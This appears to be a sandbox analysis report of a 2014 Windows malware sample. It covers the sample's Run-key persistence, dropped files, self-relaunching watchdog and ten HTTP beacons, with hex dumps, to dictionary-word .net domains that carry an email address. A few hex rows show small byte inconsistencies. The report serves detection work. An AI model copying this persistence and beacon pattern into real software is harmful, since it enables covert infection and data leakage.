Analysis Date: 2014-09-19 03:55:43 (time of the sandbox run; timezone not stated)

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text — md5: 141c5e4e57f73e38ff77c2875318bc8d sha1: 0abb59e8a9d9ef4fceea6779d42dc3d54235ef5a size: 293888
Section .rdata — md5: 7de70dade6f60c24e7aeaa9170fa79dd sha1: b82706c096f2c59cde97dc50ac6690768aa4fc25 size: 34304
Section (name not captured in this extract) — md5: 3612553368e3ccd0686c664306668df7 sha1: 3d6f91724b16b551a7400962f9b2dfaa63b9d658 size: 97792
Timestamp: 2014-07-24 05:01:34 (PE header compile time; attacker-settable, so not authoritative for dating the sample)
Packer signature: Microsoft Visual C++ (version not identified — this is a compiler match, not evidence of a runtime packer)

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Device Isolation Manager Publication Software ➝
C:\Documents and Settings\Administrator\Application Data\pvzgoeiil\xcwfkmmhgtk.exe
(user-level autorun persistence: the dropped copy is started at each logon of this user, with no elevation required; the value name mimics a legitimate-sounding Windows component, and the directory/file names look randomized, so treat both as sample-specific rather than reusable IOCs — the Run-key-to-%AppData% pattern is the durable detection)
Creates File: C:\Documents and Settings\Administrator\Application Data\pvzgoeiil\xcwfkmmhgtk.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\pvzgoeiil\xcwfkmmhgtk.exe

↳ C:\Documents and Settings\Administrator\Application Data\pvzgoeiil\xcwfkmmhgtk.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\pvzgoeiil\xcwfkmmhgtk.rim
Creates File: C:\Documents and Settings\Administrator\Application Data\pvzgoeiil\diraqgcu.exe (second dropped executable; no execution of it is recorded in this run)
Creates File: \Device\Afd\Endpoint (Winsock socket endpoint — the process opens a network socket; see Network Details)
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\pvzgoeiil\xcwfkmmhgtk.exe" (re-launches its own copy with a WATCHDOGPROC argument; the name suggests a watchdog/self-restart child, which is not confirmed by this report)

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\pvzgoeiil\xcwfkmmhgtk.exe"

Network Details (DNS: each "Type: A" entry below is one IPv4 A-record lookup; the queried hostnames were not captured in this extract — the Host headers in the raw pcap show the names actually contacted, and the large number of lookups relative to ten successful connections suggests many generated names did not resolve):
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows: TCP 192.168.1.1:1031 ➝ (destination not captured)
Flows: TCP 192.168.1.1:1032 ➝ (destination not captured)
Flows: TCP 192.168.1.1:1033 ➝ (destination not captured)
Flows: TCP 192.168.1.1:1034 ➝ (destination not captured)
Flows: TCP 192.168.1.1:1035 ➝ (destination not captured)
Flows: TCP 192.168.1.1:1036 ➝ (destination not captured)
Flows: TCP 192.168.1.1:1037 ➝ (destination not captured)
Flows: TCP 192.168.1.1:1038 ➝ (destination not captured)
Flows: TCP 192.168.1.1:1039 ➝ (destination not captured)
Flows: TCP 192.168.1.1:1040 ➝ (destination not captured)
(ten outbound TCP connections from 192.168.1.1 — presumably the sandbox guest — on consecutive ephemeral source ports 1031–1040, matching the ten HTTP requests in the raw pcap below; the destination host:port of each flow was lost in extraction, but the Host header of each request identifies the target name)

Raw Pcap (ten HTTP/1.0 requests, one per TCP flow above; no server responses are included in this extract). Every request is identical except for the Host header: GET /index.php?email=dpoyle@worldnet.att.net&method=post HTTP/1.0, Accept: */*, Connection: close. Hosts contacted, in order: thinkbeyond.net, presentbeing.net, chiefbeing.net, twelveforever.net, historyforever.net, weatherforever.net, classbeyond.net, thinkflower.net, presentflower.net, collegecorner.net. The two-dictionary-word .net pattern is consistent with a word-list domain-generation algorithm, so these hostnames are probably sample- or date-specific; the fixed URI and query shape (/index.php?email=…&method=post over HTTP/1.0 with Connection: close) is the more stable network signature. Whether the email address is hard-coded or harvested from the host cannot be determined from this capture.
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574   dnet.att.net&met
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20746869 6e6b6265   e..Host: thinkbe
0x00000070 (00112)   796f6e64 2e6e6574 0d0a0d0a            yond.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574   dnet.att.net&met
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20707265 73656e74   e..Host: present
0x00000070 (00112)   6265696e 672e6e65 740d0a0d 0a         being.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574   dnet.att.net&met
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20636869 65666265   e..Host: chiefbe
0x00000070 (00112)   696e672e 6e65740d 0a0d0a0d 0a         ing.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574   dnet.att.net&met
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20747765 6c766566   e..Host: twelvef
0x00000070 (00112)   6f726576 65722e6e 65740d0a 0d0a       orever.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574   dnet.att.net&met
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20686973 746f7279   e..Host: history
0x00000070 (00112)   666f7265 7665722e 6e65740d 0a0d0a     forever.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574   dnet.att.net&met
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20776561 74686572   e..Host: weather
0x00000070 (00112)   666f7265 7665722e 6e65740d 0a0d0a     forever.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574   dnet.att.net&met
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20636c61 73736265   e..Host: classbe
0x00000070 (00112)   796f6e64 2e6e6574 0d0a0d0a 0a0d0a     yond.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574   dnet.att.net&met
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20746869 6e6b666c   e..Host: thinkfl
0x00000070 (00112)   6f776572 2e6e6574 0d0a0d0a 0a0d0a     ower.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574   dnet.att.net&met
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20707265 73656e74   e..Host: present
0x00000070 (00112)   666c6f77 65722e6e 65740d0a 0d0a0a     flower.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574   dnet.att.net&met
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20636f6c 6c656765   e..Host: college
0x00000070 (00112)   636f726e 65722e6e 65740d0a 0d0a0a     corner.net.....

